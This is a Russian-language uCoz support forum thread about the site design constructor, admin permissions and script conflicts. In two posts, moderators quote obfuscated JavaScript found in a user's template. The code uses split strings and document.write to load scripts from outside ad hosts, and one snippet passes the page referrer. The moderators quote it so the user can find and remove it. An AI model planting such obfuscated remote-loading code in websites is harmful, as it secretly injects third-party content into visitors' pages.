Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Дизайн: управление шаблонами » Конструктор блоков/сайта: дизайн через конструктор (Описание темы)
Конструктор блоков/сайта: дизайн через конструктор
Модератор форума
Сообщение # 1 | 17:23:26
Возможность редактировать дизайн сайта есть только у группы Администраторы ID4

Для того чтобы активировать данную опцию проделайте следующее:


Панель управления ⇒ Пользователи ⇒ Группы ⇒ Администраторы ⇒ Разное ⇒ Редактировать дизайн сайта. Установите переключатель в положение активный ⇒ Сохраните







Прежде всего имейте в виду, что Конструктор блоков корректно работает только при полном соответствии шаблонов новой структуре. Если вы редактируете шаблоны визуальным редактором, то можете забыть про Конструктор блоков.

  • Важно! Нормальной работе конструктора могут препятствовать размещенные на странице виджеты. Попробуйте удалить виджеты и проверить работу конструктора.
  • Для того что бы конструктор блоков работал, необходимо включить его в Общих настройках.
  • Если конструктор включается, но невозможно им управлять, Вам следует обновить каркас.
  • Если конструктор при включении зависает, и его невозможно ни отключить, ни работать с ним, скорей всего на сайте происходит конфликт скриптов. Постарайтесь найти лишние скрипты, если сделать этого не можете - пишите в эту тему, не забыв разместить ссылку на сайт.


Прикрепления: 5336515.png (24.7 Kb) · 2767879.png (78.9 Kb)
Сообщение отредактировал webanet - Четверг, 16 Янв 2014, 21:30:29
Selena
Сообщений: 15657
Репутация: 1100

Сообщение # 601 | 19:44:39
Deagle_36, что именно работало? Уточните. И лучше на скриншотах. Поскольку не понятно, что именно пропало.

Отправляя сообщение о помощи, приводите ссылку на свой сайт. Это не считается рекламой, зато снимает массу вопросов.
Kotofei1194
Сообщений: 20
Репутация: 0

Сообщение # 602 | 21:15:56
Я добавила в Активные "Доску объявлений", но она идет с категориями, а мне надо, чтобы категорий не было. Если я удалю этот модуль, у меня ничего на сайте не попортится? Или как мне его превратить из модуля с категориями, в модуль без категорий?

Мой персональный сайт о путешествиях
http://stranstviakota.ucoz.ru/
Сообщение отредактировал Kotofei1194 - Понедельник, 03 Мар 2014, 21:18:10
Deagle_36
Сообщений: 32
Репутация: -1

Сообщение # 603 | 21:18:38
Selena, Не работает вот этот конструктор а раньше работал
Прикрепления: 3438481.png (11.6 Kb)
Selena
Сообщений: 15657
Репутация: 1100

Сообщение # 604 | 21:19:27
Kotofei1194, модули удаляются со всеми материалами. На другие модули никакого влияния при этом не оказывается. Если вы создали Доску с категориями, а они вам не нужны, то вы спокойно можете удалить модуль и создать по новой, но уже без категорий. Там есть такой выбор при создании.

Отправляя сообщение о помощи, приводите ссылку на свой сайт. Это не считается рекламой, зато снимает массу вопросов.
Selena
Сообщений: 15657
Репутация: 1100

Сообщение # 605 | 21:20:41
Deagle_36, как именно не работает? На скриншоте же он есть.

Отправляя сообщение о помощи, приводите ссылку на свой сайт. Это не считается рекламой, зато снимает массу вопросов.
Deagle_36
Сообщений: 32
Репутация: -1

Сообщение # 606 | 21:23:46
Selena, на скрине пример привел что не работает скрин взял с другого сайта,а почему не работает я и не знаю,
и вот ещё в личном кабинете а на остальных страничках нет
Сообщение отредактировал Deagle_36 - Понедельник, 03 Мар 2014, 21:25:30
Selena
Сообщений: 15657
Репутация: 1100

Сообщение # 607 | 21:25:12
Deagle_36, в шаблоне скрипт может стоять, прячущий админбар.

Отправляя сообщение о помощи, приводите ссылку на свой сайт. Это не считается рекламой, зато снимает массу вопросов.
Deagle_36
Сообщений: 32
Репутация: -1

Сообщение # 608 | 21:26:55
Selena, если даже есть скрипт прячущий админбар как его найти и убрать ?
Selena
Сообщений: 15657
Репутация: 1100

Сообщение # 609 | 21:39:44
Deagle_36, вот эти:

Код
<script type="text/javascript" src="/design/script_site.js"></script>
<script language="javascript" src="/design/mootools.js"></script>


Что делают? Если используется другая библиотека jQuery, то получается конфликт. Вот ещё в исходном коде вижу не закрытый тег:

Код
<script type="text/javascript">var s = "w.bc";var m = Math.floor(Math.random()*15000);var v = "ru";document.write('<s'+'cr'+'ipt language="javascript" charset="windows-1251" type="text/javascript" sr'+'c="htt'+'p:/'+'/ww'+s+'ggo.'+v+'/go.php?id=9234&m='+m+'&ref2="+escape(document.referrer)"><'+'/scr'+'ipt>');

Отправляя сообщение о помощи, приводите ссылку на свой сайт. Это не считается рекламой, зато снимает массу вопросов.
Deagle_36
Сообщений: 32
Репутация: -1

Сообщение # 610 | 22:17:19
Selena, а можете кинуть в правильном виду и где они находятся
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 611 | 22:30:20
Deagle_36,
Код
<script language="javascript" src="/design/mootools.js"></script>
удалить. генерирует всплывающее окно с рекламой чужого сайта
из футера удалить

Код
<script type="text/javascript">var s = "w.bi";var m = Math.floor(Math.random()*15000);var v = "ru";document.write('<s'+'cr'+'ipt language="javascript" charset="windows-1251" type="text/javascript" sr'+'c="htt'+'p:/'+'/ww'+s+'str4.'+v+'/go.php?id=9234&m='+m+'"><'+'/scr'+'ipt>');</script>
<script type="text/javascript">var z = Math.floor(Math.random()*25000);var i = "w.ta";var r = "il2.ru";document.write('<s'+'cr'+'ipt language="javascript" type="text/javascript" sr'+'c="htt'+'p:/'+'/ww'+i+'r'+r+'/go'+'.'+'php?id=9234&z='+z+'" charset="windows-1251"><'+'/scr'+'ipt>');</script>
<script type="text/javascript">var s = "w.bc";var m = Math.floor(Math.random()*15000);var v = "ru";document.write('<s'+'cr'+'ipt language="javascript" charset="windows-1251" type="text/javascript" sr'+'c="htt'+'p:/'+'/ww'+s+'ggo.'+v+'/go.php?id=9234&m='+m+'&ref2="+escape(document.referrer)"><'+'/scr'+'ipt>');


сторонняя реклама. вы поставили грязь, а не шаблон. может стоит сменить на стандартный, чем эти нечистоты на себе носить и героически с ними бороться?

читайте тему //forum.ucoz.ru/forum/35-34990-1#992773

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Kotofei1194
Сообщений: 20
Репутация: 0

Сообщение # 612 | 22:37:53
Selena, спасибо!
Всегда страшно нажимать кнопочку "Удалить" smile

Мой персональный сайт о путешествиях
http://stranstviakota.ucoz.ru/
natalia8657
Сообщений: 8
Репутация: 0

Сообщение # 613 | 10:33:39
Здравствуйте, подскажите пожалуйста. я администратор школьного сайта, нажимаю конструктор, затем пытаюсь открыть управление меню, у меня нет доступа, выходит окошко -- "Вы входите в группу пользователей, которым запрещено совершать данное действие. По всем вопросам обращайтесь к администратору сайта. "
Что делать?????? До этого два дня не могли вообще на сайт зайти, выходило окно -- "Доступ к сайту запрещен по решению суда или иным причинам..... " (приблизительно так...) Буду благодарна за помощь.
$Vladimir$
Сообщений: 7465
Репутация: 1053

Сообщение # 614 | 10:54:33
natalia8657, если ваш аккаунт на сайте входит в группу Администраторы и у вас есть доступ в панель управления сайтом, выполните действия описанные в первом сообщении данной темы.
Tokarev
Сообщений: 1
Репутация: 0

Сообщение # 615 | 13:30:47
Доброго времени суток.
проблема - захожу под администратором - высвечивается администратор
включаю конструктор - включается
захожу в блок меню для перемещения одного из пунктов в подпункт, а мне выдает сообщение

Что делать?
Сообщество uCoz » Мастерская uCoz » Дизайн: управление шаблонами » Конструктор блоков/сайта: дизайн через конструктор (Описание темы)
Поиск: